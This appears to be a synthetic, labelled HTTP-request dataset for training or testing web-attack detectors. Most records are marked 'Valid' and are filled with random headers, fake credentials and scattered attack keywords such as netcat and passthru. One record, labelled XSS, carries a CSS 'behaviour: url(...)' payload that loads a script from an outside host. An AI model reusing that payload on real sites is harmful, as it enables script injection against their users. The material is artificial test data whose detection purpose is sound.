Upgrade: syagel/7.4, wae/1.3
Warning: 783 107.227.6.97 "3ldiullnaotesre" 
X-Forwarded-For: 110.4.41.253
X-Serial-Number: 74768030946395
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 29268
Start - Id: 22584
class: Valid
GET /nipRksredondtIe/gefftf5k/rja/nhn/GoFei.cgi?Lho=tveF_BWy&em=1&ehrnr8Psn=%26eenA%3Ce%7E+txninclude&phpkTv5B=fPtsMAKem&sveuc2=0asr7&aoxIa9O=%40estdin3+tfyth%2F2between HTTP/1.1
Host: 204.233.249.94
Connection: rkaHmk
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 44.65.129.4
Cookie: ee2ninnoPUrremn=];VwW5H5Xi=r;2sOss=6lysjrneeS
Cookie2: $Version="291"
Date: Thu, 19 Nov 09 18:00:22 UTC
ETag: W/"U5triMCzA1VMbPUS"
Expect: sFsno=diecsy;rs1lhsp
From: tTei@hw46m3.be
If-Modified-Since: Tue, 06 Jun 06 11:54:05 CET
If-Unmodified-Since: Tue, 01 Dec 09 18:04:34 UTC
If-Match: *
If-None-Match: "78zrQFT2bbUfTov_mifs"
If-Range: "4DVA_SmCX1Mw24pcp@"
Max-Forwards: 5
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest uri=http://28yon.org/iij6lh/pkbw3gd/AoND/aehai/s4tirli.gif
Authorization: Digest uri=/ra2h9/a8scqni8/caaaama.pdf
Range: 4696-5,-34840
Referer: http://ahma.cz/t2uRa/mNce5/t8stnsc/icxnr0.wav
TE: deflate
Trailer: Accept-Charset
User-Agent: Mozilla/1.0 (X11; U; Open BSD i586 9.0; at-he; rv:6.0.8) Gecko/26273672
UA-CPU: MIPS
UA-Disp: 869,372,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 012x8198
Via: FTP/0.4 www.dwlsb.css
Transfer-Encoding: identity
Upgrade: mhcsbe/5.4, rea/6.1, rvnsK6/9.4, i1O/4.3, dsl/5.2
Warning: 649 www.3snl9.jpg:7772 "cetphelatiyt" 
X-Forwarded-For: 5.120.156.102
X-Serial-Number: 8769415
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22584
Start - Id: 30930
class: Valid
GET /qNApassthrulU@BTb/Ci/jpdH_V/xnQL.JI/uIl8pF30cJWfdnCb/amfpiCplmeiytyndihs.mdb?mesaEah=wHfsVzjm85e&ba9hUreaos=iNpu6wm&chreur6m=icopys+eiY+ HTTP/1.0
Host: 72.16.219.94
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-ce, euc-cn;q=0.7, iso-8859-2
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-age=8360
Client-ip: 72.150.7.170
Cookie: ryoaees8rsa7=1;iFBzl='nh;hj=4plZ25;hmniedebed=221613;dD3hSrtiaaoah=h8re
Cookie2: $Version="013"
Date: Thu, 08 Oct 09 12:50:06 UTC
ETag: "O@mBYC_ssvNwLkorZ"
Expect: 100-continue
From: eSAnM@ahoeenfee.biz
If-Modified-Since: Wed, 31 Jan 07 08:53:51 UTC
If-Unmodified-Since: Sun, 13 Jan 08 20:15:13 CET
If-Match: *
If-None-Match: *
If-Range: "TvXUzCLzjVDq8cYM"
Max-Forwards: 6
MIME-Version: 0.3
Pragma: st='pTnh1dA'
Proxy-Authorization: Zw7ltl irs7a=wat2Do
Authorization: Basic aHNyZ2NlOnVXZWxoYXZ0
Range: 005795-033417,-34989
Referer: /Ecttc/seamu/tn8ag5/eeisl/ahrcsvi.gz
TE: trailers
Trailer: From
User-Agent: xntyx/1.9.4.5.8
UA-CPU: MIPS
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 1031x1153
Via: 0.1 93.210.135.157, 3.9 www.eotxen.png, 0.2 14.3.54.84
Transfer-Encoding: compress
Upgrade: tmb/6.0, ite/9.3, wsxo/2.3, chem/0.2, r6o/0.4
Warning: 528 150.223.116.32 "eiib2tvfathrBNuolv" 
X-Forwarded-For: 93.207.235.159
X-Serial-Number: 535265474092814212
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30930
Start - Id: 24628
class: Valid
GET /dxZonetcati0Rh4qjO/x5vxI0/sQMN0EKW4Ecclr2D3k/0NImrdugeeRhE/rtp/lPMy/aseie.htm?lsxtermFF=TolLrrihayi0st&hBhannns9d9srit=t-seeq1pt&q5NwYr@mC-tmpz=62075542&tt9ii8e=360534&x8yowecd=05402&window.open9skAM=nZInezRV HTTP/1.1
Host: www.5ntr9.com
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.0, deflate
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 153.210.163.65
Cookie: ttcrhri17eo9=Wtnw;thseudv=65357;dtef3fbywJaxnh=14431;rP.l4enGP=itaaca9burpWoqeUck;beeSrtrmbrg=yTla8Inlbauot
Cookie2: $Version="217"
Date: Wed, 11 Jul 07 20:51:55 GMT
ETag: W/"R42UaEF-6rwLFouHVz"
Expect: 100-continue
From: utgowu@dmbui.org
If-Modified-Since: Fri, 28 Jan 05 18:26:46 CET
If-Unmodified-Since: Thu, 27 Apr 06 05:25:44 CET
If-Match: *
If-None-Match: "R6rls_D32FjaNShK.es"
If-Range: *
Max-Forwards: 03
MIME-Version: 6.7
Pragma: qsme=Sja
Proxy-Authorization: Aetu wn0njq5x=zlf8l
Authorization: Digest opaque="Etmn"
Range: -543,-70
Referer: http://5eepnqao.com/nhyeqct/euecned/i1Nicey/htfosc/pere7.aspx
TE: deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.4 (X11; U; Linux i386 4.3; dd-es; rv:6.1.1) Gecko/45736349
UA-CPU: StrongARM
UA-Disp: 678,816,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4560x959
Via: 5.7 www.roisGe.png:3587, far/2.3 10.31.81.190, FTP/6.6 28.138.192.137
Transfer-Encoding: compress
Upgrade: udg/0.5, ulmirt/6.0, 5guTu/1.8
Warning: 725 www.hdse.js "umrhh5ybso" 
X-Forwarded-For: 97.48.167.87
X-Serial-Number: 562281573568029685
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 24628
Start - Id: 15626
class: Valid
GET /6pXR4metaMopen/ro2pAherkrolf/23F5Xd/ye1n4@/9otsway.pl?icxrHQ-zOPov=8127&reTe2nr=eX8&1sbtcyeef=2tuno8xuwSv0oo&oecreTeaniasi=lOyeCRswF0&hdafseneiesi=1&P5VJW=lge&U6jcvn=39d5hw&rls3U.p=n&Bln=vOP-&iAccfmChle=%40scriptza&fopss=eLTamseth&aenwtiisOEcr=hoF HTTP/1.0
Host: 162.118.202.182:1195
Connection: keep-alive
Accept: text/*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.9
Accept-Language: wauo-uugirsn8;q=0.3
Cache-Control: no-store
Client-ip: 138.107.228.97
Cookie: ehyinpzh=0;ieonw=iQzU0Me;z0Worp=com8opddnnh
Cookie2: $Version="681"
Date: Sat, 23 Jul 05 13:17:44 CET
ETag: W/"12NQOr7jXUOXeYr"
Expect: 100-continue
From: tre3@eoezisahr.net
If-Modified-Since: Sun, 30 Aug 09 09:03:42 UTC
If-Unmodified-Since: Mon, 23 Oct 06 13:05:08 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Dec 07 07:22:17 CET
Max-Forwards: 8538
MIME-Version: 9.3
Pragma: i=1s6vrir
Proxy-Authorization: NTLM MnNlRHh4aG54c213RmY5cnNlbjRubnlhcWJ0ZWR6bGhuZ3Y5bmVzbmxhb3NjZW0=
Authorization: NTLM b2had1RtZXZPbmlvbWI5Z29VdHNyckh0U3M1ZWVsbmVnZXN1eWVh
Range: 3-,76842-90
Referer: http://ftasasai.org/esmT/taiaqnn/trrsiyg/hoor.js
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/6.3 (Windows; U; Win98 7.4; tR-zn; rv:4.6.5) Gecko/62270849
UA-CPU: PowerPC
UA-Disp: 331,063,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1680x9534
Via: bne8b/6.4 207.154.161.35, bta/0.3 170.53.124.136, 2.8 www.asiobv.html
Transfer-Encoding: oleoi; eeiee=pTehee
Upgrade: aih/4.7, ohs/5.1
Warning: 296 21.29.80.130 "ftrea1aodrgLxosdn" "Sun, 07 Mar 10 04:33:55 GMT"
X-Forwarded-For: 112.169.80.103
X-Serial-Number: 42056284732310990
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 15626
Start - Id: 7720
class: Valid
POST /abAsk/im8.CjmEHz/rcIemscne6oazreIzep/telnetrZ/ClDDsNClQ/.8BPUr/mY@EOabv8T-/ef6utu/ynph-rom/aa4boionKtb3m/s1seStshirle9dto.gif? HTTP/1.0
Content-Length: 96
Content-Language: Ov,aghsi,ea
Content-Encoding: gzip
Content-Location: /agat6u.bin
Content-MD5: c3RpaW9pb3VsYXVlaGhvdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Aug 07 18:32:34 UTC
Last-Modified: Thu, 22 Apr 10 20:15:17 CET
Host: www.ape2etd44e.cz
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.9
Cache-Control: max-age=4
Client-ip: 53.244.216.41
Cookie: haacmxa3ilnI698=oyperm;newsfOiAhnoyts3=pesofsEab16yhnn;I3DK_RNyk=94946;mr=fEytta
Cookie2: $Version="5"
Date: Wed, 28 Mar 07 07:39:06 GMT
ETag: "Lq7IiLf280N95wqM-yI"
Expect: lsoebqnj=eEeamdo;biEHtea=yneeSvNH
From: hmytnwrh@n44u6.net
If-Modified-Since: Wed, 11 Aug 04 06:34:09 CET
If-Unmodified-Since: Sat, 26 Aug 06 24:06:31 CET
If-Match: *
If-None-Match: "CsPlLT6uMbFrUeivp"
If-Range: *
Max-Forwards: 2981
MIME-Version: 7.7
Pragma: wn=djTeprae
Proxy-Authorization: NTLM cnltaHNmN2tjcHJ0YXNyZm9JdEllN3JwdGVlMGRldW5kU3JhWnk=
Authorization: Basic VG1pbjpOdDRvZXc4
Range: 408895-516542
Referer: /otsotum/lonesdks/njhdanr/i43drh/belI.pl
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: onnebb (fcW@7Qa)
UA-CPU: Sparc
UA-Disp: 679,410,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 093x4978
Via: 7.5 www.3r9bnon.htm
Transfer-Encoding: nTThh; wrus=htaeifi
Upgrade: rgaM/6.2, eac/6.8, aZco/9.9, tRa/2.6, hle/2.5
Warning: 480 196.122.77.17 "8mahoZAa56riutaIm" 
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 575043034
----: ----------------
~~~~~: ~~~~~~~~~~~

RT=94&Aht84gOhhOcp= h e f ieVzi0a%a&lky2rnd=1ipou&c2xtsnceew=9&vsl&lnullin8=4ieSta&at=artoey

End - Id: 7720
Start - Id: 7703
class: Valid
PUT /hnx2IdAkFUnkV/lrDMGs4Jy@.jsp? HTTP/1.1
Content-Length: 210
Content-Language: tek,cosanr,he
Content-Encoding: identity
Content-Location: http://eenn7.gov/ecSc.nsf
Content-MD5: MGVhZWVkczV0SVJhb29ucw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 21 Sep 05 02:48:06 UTC
Last-Modified: Mon, 29 Nov 04 01:31:01 CET
Host: www.xzvase.org
Connection: ccnih
Accept: application/x-tar
Accept-Charset: utf-8;q=0.2, windows-1255
Accept-Encoding: 
Accept-Language: ee0ae-Zti;q=0.9, ots-r5ce, hraeioRe-dh;q=0.6
Cache-Control: only-if-cached
Client-ip: 140.35.47.96
Cookie: CAQbgsound7tSDTg3=eeIkfaes9nieea8;osTng=lsrtwmope;oi=9;openmd2Uvar@iPlDG=gei](2rb;oncm1seE5vl=3269998;htattiir2AGhE=ecsCs
Cookie2: $Version="2"
Date: Mon, 29 Mar 04 14:50:41 GMT
ETag: W/"A1nVorZshNYyfX_"
Expect: abtnrTn=uAtNnm
From: hmytnwrh@n44u6.net
If-Modified-Since: Thu, 01 May 08 07:02:55 UTC
If-Unmodified-Since: Tue, 19 Aug 08 06:06:49 GMT
If-Match: "VTcj90c6NkIvMZZd"
If-None-Match: "7z9@-NDClbse3jzS8r.1"
If-Range: *
Max-Forwards: 53
MIME-Version: 3.0
Pragma: aiw=ter
Proxy-Authorization: NTLM ZVNjaGhjZGlpM3VUUm95ZWUxcmVnQ2tpcG43OFpsZXJudGtyaW5u
Authorization: NTLM bXRlaG91YXRwS2R3amhvbDByQmF0b29sdGhUc3NDZXVlNGw1ZW90Y3R0YXR5bmll
Range: -3455,4046-20573,120388-4
Referer: http://www.ogJerEp.fr/3aeweno/4oKrgh/iatoE.msf
TE: trailers,chunked,trailers
Trailer: Via
User-Agent: Mozilla/8.4 (Machintosh; U; PPC Mac OS X 0.1; ce-ys; rv:8.1.2) Gecko/05890662
UA-CPU: Sparc
UA-Disp: 609,771,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0906x269
Via: s2efe/2.9 www.n9lsih3r.html, 8.8 www.heaiin.shtml:6679
Transfer-Encoding: identity
Upgrade: tiePoA/0.8, hIo/8.8, sMltc9/9.2
Warning: 298 49.117.1.87:98 "Nrrunl7neIh" "Thu, 09 Aug 07 17:28:09 UTC"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 5287621951731
----: ----------
~~~~~: ~~~~~~~~~~~~~~

ooaiwqlc2=1298160&ntweeiia=89862&xexec.EcatlP=hwT&ertenQc28uMp=62&I9mhuanOeEpxe=8&ogl=99010537&aci=ic1]jcopylsi8sftp&WABtb=42585&Uhaoeirhqht=oly~&lU3=orcatenxi0c2n8&bosejdw=hlr=h&rw8rb=1251&4udis6ty=88584

End - Id: 7703
Start - Id: 15968
class: Valid
GET /oyno3aWtinteoitz5D/s@MJ4lY-jEIr/fJBENyXcK/rpqloisgd/G-ABI1/atrlXrmeimfnrn/noNjuni43k/es0jD5I/dxz/viaidnebn2iEotr/widtt8h5ktemhrh7y.jsp?FCmeta18=8&keioC5zsn=S&tOy=dunalj&fseioterc=291&BRmfhpoen=s1hanbiiuaduutma&Ce6sb3eqs7Eem=36&ebxmvimtd=rd%2F&ehe5iytogcssl=7605&tbwaeOtthO9teT=9325&4DilqtayeapG=+htEf&gelgwh2i=30597379&wu8=%40%2Famperl4%24etcd%7EV%28lpe&03i58=8079 HTTP/1.1
Host: 28.93.83.108
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-hebrew, windows-1254, isiri-3342;q=0.4
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 110.241.224.8
Cookie: bdpduse2s=a;6uldeit=2039
Cookie2: $Version="544"
Date: Sun, 02 Sep 07 09:19:24 GMT
ETag: W/"8qLPmwUguxnY_bc"
Expect: u1thh0
From: ddlde@onchnbe.de
If-Modified-Since: Tue, 28 Oct 08 18:48:14 GMT
If-Unmodified-Since: Sun, 16 Apr 06 03:18:15 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Aug 06 04:07:59 UTC
Max-Forwards: 3144
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Basic cXVEeHJldXI6ZGlvNmQ=
Authorization: NTLM YW5lYWxUZXVzdTUzcWVvaWFodE9vMHRocXJuck9ldHVocA==
Range: 08-06,-75180
Referer: /0ehdoeeB/Asaeo/a42htdr.ace
TE: chunked,chunked,deflate
Trailer: Trailer
User-Agent: Mozilla/7.7 (compatible; MSIE 5.5; Open BSD i386; enue3drr)
UA-CPU: x86
UA-Disp: 843,2747,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 221x576
Via: noR/1.1 85.0.230.225
Transfer-Encoding: compress
Upgrade: dg6/8.1
Warning: 177 www.E8otcw.gif "fkekM9nl" "Wed, 27 Apr 05 12:41:49 GMT"
X-Forwarded-For: 37.146.157.183
X-Serial-Number: 902795825
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 15968
Start - Id: 48211
class: XSS
POST /bGwqnetcat_IPVeHhttpU/ZovballI6vOzF/xhl/lLBWry4mW-qzgE-m3lt/G4U/6G-8gXtOTf/pr_RyxDqH8MV/uo4/94c/ggzwRrthtkdl8hhN.mspx? HTTP/1.1
Content-Length: 53
Content-Language: Uigsoe3,l
Content-Encoding: identity
Content-Location: http://a2ltZd.com/errie/ssnrea/aeegee.jpg
Content-MD5: YWV4cGFhVXNwbnJ0OWhqQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 Jul 05 07:01:10 GMT
Last-Modified: Thu, 01 Nov 07 04:37:29 UTC
Host: www.e8pfe.org
Connection: close
Accept: application/*;q=0.7
Accept-Charset: *
Accept-Encoding: <div style   ="   behaviour: url([http://www.eran.com/script/nhktyu.pl]);   " >
Accept-Language: i2IkmCrg-ktoisEse;q=0.9
Cache-Control: no-transform
Client-ip: 188.123.167.43
Cookie: eiWlvtC0ksap=hn9weeaoeKddawt;ynniDkndMaorncs=l6NU;sneslenEaeiiO=includeiy;eeqAewha3eE8f= b5sju9/Hors7e Ed ;raeSpeiEeea=31579785
Cookie2: $Version="5"
Date: Tue, 01 Jan 08 14:56:18 UTC
ETag: W/"JkNm7sD6l4qVMEyYQ5ri"
Expect: 100-continue
From: kTOsae7a@Lnatniube.cz
If-Modified-Since: Sat, 04 Apr 09 14:05:16 CET
If-Unmodified-Since: Wed, 09 Jan 08 05:32:27 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 6.3
Pragma: esSm=eltioIo
Proxy-Authorization: Digest cnonce="ccntio"
Authorization: Digest realm
Range: 9-78819
Referer: /bntl/llrkn/otnt/aG51/hasNtc.mpg
TE: deflate;q=0.0,trailers
Trailer: Accept-Encoding
User-Agent: rdteeompPe3rndleha1
UA-Disp: 5215,325,8
UA-Color: color32
UA-Pixels: 179x443
Via: FTP/1.1 www.erws.js, 1.9 www.lybsdere.htm, 3.8 www.duszjamh.html
Transfer-Encoding: srhdm1; hyTkey=nlfer8
Warning: 878 www.r5rehang.gif "hcioniot2im682agn" "Thu, 10 Nov 05 20:56:18 CET"
X-Forwarded-For: 16.22.84.83
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rntbdeupmi2q=stai'Tlse62 nt&tdeaxt4e=uj@h-PcCkjTe

End - Id: 48211
Start - Id: 30923
class: Valid
GET /zhehhsdqoBefeaeEicg/a5Li__nnB/etbgzblsDjscoqe5ts8/t1/argelefo1cdoppg/Auoi/ooLX/tayiawnek/f-2CExWdCN8/ylzI/ereDvcq/qB.jpeg?u@wadminwx7atmpnetcatuand=kU12H_K%40p&on7Bealiint=268&rirmzoht8pan=t%5Csbi%3Cpassthrucopygt%40cis5%7E%27&0ibs1=4247&6q6=806 HTTP/1.0
Host: 7.238.119.58:80
Connection: keep-alive
Accept: audio/x-wav, image/*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.8, gzip, identity;q=0.9, gzip
Accept-Language: snkO6r-Slad7hgl, oit-ou5iHvH
Cache-Control: aTlb7o=o
Client-ip: 237.192.101.254
Cookie: ryoaees8rsa7=1;iFBzl='nh;hj=4plZ25;hmniedebed=221613;dD3hSrtiaaoah=h8re
Cookie2: $Version="92"
Date: Wed, 29 Mar 06 12:55:39 CET
ETag: W/"nVuwNmxr9TNDf-.rQVPL"
Expect: 100-continue
From: eSAnM@ahoeenfee.biz
If-Modified-Since: Sun, 20 Feb 05 16:33:16 CET
If-Unmodified-Since: Sat, 24 Dec 05 11:00:48 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Feb 08 03:13:33 GMT
Max-Forwards: 29
MIME-Version: 5.0
Pragma: a0e3Isk='g'
Proxy-Authorization: Zw7ltl irs7a=wat2Do
Authorization: Basic aFR5RTFpaDpIODVjbGU=
Range: 7-19547,727449-
Referer: http://rqahm7t.cz/asat/gloecbc/6Tuly6/j6hr.txt
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: xcorsdna
UA-CPU: MIPS
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 1031x1153
Via: 1.8 www.Eforetso.js:7
Transfer-Encoding: identity
Upgrade: eily/4.9, eee2ss/1.6
Warning: 528 150.223.116.32 "eiib2tvfathrBNuolv" 
X-Forwarded-For: 93.207.235.159
X-Serial-Number: 535265474092814212
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30923
Start - Id: 8748
class: Valid
GET /5_9boot.inis2NlinkcgXc/wwQWUxllwVoDQ/iEErnl/iuhi5lsesce/ciaNg52s.php4?ooowoceMvnattu=hg&e8=wip6i&ouin=41833&nldygycctea=08&UY0xvK=66890569&ehOcnhorhr=taconnectynugroup+bytfmt+huaouh&_srcpU_oH-=%3Flinclude%29&ljaNesie=oAis69Szpnc9&h4=di%2Bh+sunione6ve+teea&h6eRheu4ectr=atxsavarehn%5Destrm&t6lhsHgLeh=84&byetianri=387 HTTP/1.1
Host: 15.65.204.100:80
Connection: close
Accept: */*
Accept-Charset: x-mac-greek;q=0.9
Accept-Encoding: deflate, identity;q=0.7
Accept-Language: n-d4windze, dnlrmS-4int;q=0.3, ta-shs;q=0.4
Cache-Control: no-store
Client-ip: 11.138.13.94
Cookie: amm5lnhDs5=632251605
Cookie2: $Version="149"
Date: Thu, 26 Aug 04 05:01:52 GMT
ETag: W/"a@RBy6YzAxXFbiS"
Expect: 100-continue
From: gtRthpn@euhjO9.it
If-Modified-Since: Fri, 27 Jun 08 01:30:31 GMT
If-Unmodified-Since: Mon, 31 Oct 05 05:28:08 CET
If-Match: *
If-None-Match: "0-f5XOjTCCRpUfzGrsO"
If-Range: Mon, 13 Jul 09 02:23:36 GMT
Max-Forwards: 3850
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: twi2ig maenlana=he6iSwdI
Authorization: Basic aW8wdW86eGZtNThlaG8=
Range: 291-,7962-175
Referer: http://tukhttEg.st/n5aoqazt/glwu.mspx
TE: deflate;q=0.5,trailers
Trailer: Accept-Language
User-Agent: Mozilla/8.4 (compatible; eeorb; Linux i386; wrhiaray; rer59rri)
UA-CPU: PowerPC
UA-Disp: 036,8992,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 323x9926
Via: HTTP/3.8 38.233.186.80, 3.5 www.tmehi3rt.png:1102, 6.0 182.93.239.66
Transfer-Encoding: deflate
Upgrade: nr2n/6.6, c8dm/9.0, eih/0.8, mee/9.2
Warning: 642 69.235.0.195:2770 "RaqtwI1" "Tue, 27 Jul 04 11:32:37 GMT"
X-Forwarded-For: 85.79.219.185
X-Serial-Number: 14852095010495286519
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8748
Start - Id: 14870
class: Valid
GET /rOAm/khzm6a/jAe_AIrymgT4z_OuPV/V7F/f9IUR55f/ijkaAUt3uSMatvQzHW/lhAidHM/rQB3-zsWB.nsf? HTTP/1.0
Host: www.ziS3ryO.biz
Connection: close
Accept: video/quicktime
Accept-Charset: windows-1250;q=0.0, windows-1257, iso-8859-2;q=0.3, koi8-r;q=0.6, windows-874
Accept-Encoding: *;q=0.9
Accept-Language: h6-teuA, ca-tjecso;q=0.4, dy8eYgt-ol, xmiEa-hhkwo
Cache-Control: only-if-cached
Client-ip: 239.109.47.175
Cookie: 3eR8Sdyp=84;1oOlttpm=071357
Cookie2: $Version="76"
Date: Sat, 30 Jul 05 01:35:03 UTC
ETag: W/"7Ww2LqRBAnXCQUCD93"
Expect: 6n8e
From: esqSl33e@mnaR5.com
If-Modified-Since: Tue, 25 Apr 06 17:27:47 GMT
If-Unmodified-Since: Wed, 06 Oct 04 08:56:13 CET
If-Match: *
If-None-Match: "-ZvH0G5sSFCUJRo"
If-Range: *
Max-Forwards: 6
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: Basic dTJpZWJibzpBaWV0aWg=
Range: -43,-61335,692292-223
Referer: http://meeuee.fr/HaesbEae/mese.js
TE: trailers,chunked;q=0.1,trailers
Trailer: Referer
User-Agent: oirndR (oh0hM3-)
UA-CPU: Sparc
UA-Disp: 448,204,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 923x8805
Via: FTP/5.8 98.44.93.234:90
Transfer-Encoding: z3et
Upgrade: titwo/7.7
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 121.34.208.174
X-Serial-Number: 883982110
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14870
Start - Id: 25132
class: Valid
GET /uDc0ogl6V/eillolninntajydwert/a9Iceecri/MfNvW/3pseasomP/e1nYSqPf3A/U5e4Ix@/DSe0YpO/pBgLpPvJwz.jpeg? HTTP/1.1
Host: www.t5ey.net
Connection: close
Accept: application/postscript, image/*, application/*
Accept-Charset: x-mac-hebrew;q=0.9, euc-cn, x-mac-hebrew, x-mac-cyrillic, iso-2022-jp
Accept-Encoding: *;q=0.1
Accept-Language: t-0d;q=0.8
Cache-Control: only-if-cached
Client-ip: 149.26.236.30
Cookie: tadaceoandwqaer=36;airu2wyiArsc=dAw;tiih9e8bteo=r$sv8;itsTtdnaAn=gd(
Cookie2: $Version="0"
Date: Tue, 18 Sep 07 17:48:00 GMT
ETag: W/"OdqQGT-K5rFaplwUgeJ"
Expect: hSMh=itnee
From: ucsmIesc@tbh3i.it
If-Modified-Since: Wed, 20 May 09 16:23:53 GMT
If-Unmodified-Since: Wed, 23 Jun 04 23:57:39 UTC
If-Match: "Qck8wESYDJbFuxYU4f"
If-None-Match: "G_v1XOzBB9C4WMD.x"
If-Range: Wed, 15 Oct 08 24:58:59 CET
Max-Forwards: 2
MIME-Version: 1.2
Pragma: rae='ltdlsi'
Proxy-Authorization: NTLM b3JkdHBhMWFvaGVsYXRFZWUzMG9pajlpc25vaTl0YW5udW4=
Authorization: Basic dW1pdDplbGR6dGFzYg==
Range: -47756
Referer: http://www.faeeu.com/3Ei9iiLa/56spq/sipwl5j.mspx
TE: gzip
Trailer: If-None-Match
User-Agent: Mozilla/6.0 (X11; U; Linux i386 5.3; q8-zw; rv:7.4.4) Gecko/88243947
UA-CPU: PowerPC
UA-Disp: 037,012,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5457x802
Via: HTTP/4.5 8.97.26.140:84
Transfer-Encoding: gzip
Upgrade: rle/3.1, oaatl/1.5, seeNg/9.4, nHrat/7.6, tsarti/6.4
Warning: 667 www.ecitwrb.jpg "hagkslkdeoiEwoaeL" "Sun, 08 Aug 04 11:38:20 GMT"
X-Forwarded-For: 31.113.199.2
X-Serial-Number: 04027
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 25132
Start - Id: 19335
class: Valid
GET /u6hs4drl3/en8motwadaaeio/J5TE53FZHT/tsvEJUi8oM_HhH2T/sIdArdq7er/otg4m69yp7eD/uKYjS/we8a/sj.67O@4kLsdj/esmctqmtd.mdb?meuD=kE-p4jxtdrx&WUdilog=div8ontelnet1g&aOE4aXsh9iaeirr=tsock_streamsb-+ihnoele&gchCjrwsblt=dqsba HTTP/1.0
Host: 130.188.41.110
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: ntixlnIb-19it;q=0.4, tT-ks5enrs, i-eznntet;q=0.6, i5vnshS-6;q=0.4, tbout-at2no;q=0.2
Cache-Control: no-cache
Client-ip: 33.79.28.5
Cookie: s2cygseayehine=stsx9a9;Rieo=3o$f<crottke:b;hwacjh=03;hc=ePpA;or=3980390
Cookie2: $Version="791"
Date: Fri, 30 Apr 10 23:07:33 CET
ETag: "yM.b@PPpJOVPMPCQ"
Expect: totcoe=xvtohed
From: Zda4pbA@utsheoe.biz
If-Modified-Since: Sun, 24 Jul 05 01:58:38 GMT
If-Unmodified-Since: Fri, 07 Nov 08 24:40:58 GMT
If-Match: "JJr@mBC-1_FM@Fy_"
If-None-Match: *
If-Range: Tue, 16 May 06 20:45:17 GMT
Max-Forwards: 99
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM Um01Y2VydWFIbm5oaDFsRXlsYXQwaWlzYWhtMUhzMzl1YXd0c0Fld2J1bWk=
Authorization: NTLM c2FjT2xjRm5IZ2FudHJmaW5ubm5hZWVJczhzdDA4bW1hc2RpcmV1c3Rmdg==
Range: 0-6218,62-,-50681
Referer: /eerths/qnbpsdR/e2rmtq.cgi
TE: trailers
Trailer: From
User-Agent: Mozilla/1.9 (Windows; U; Win 9x 4.5; Io-h3; rv:3.0.8) Gecko/52582357
UA-CPU: StrongARM
UA-Disp: 589,2791,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 352x2255
Via: 4.0 114.22.184.23
Transfer-Encoding: deflate
Upgrade: mt1/2.2, et8/1.8, iIcNti/6.4, teilcd/0.2
Warning: 393 82.153.131.121 "5rke" "Mon, 28 Jan 08 09:40:53 GMT"
X-Forwarded-For: 83.53.98.240
X-Serial-Number: 0947873125180577061
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19335
Start - Id: 12067
class: Valid
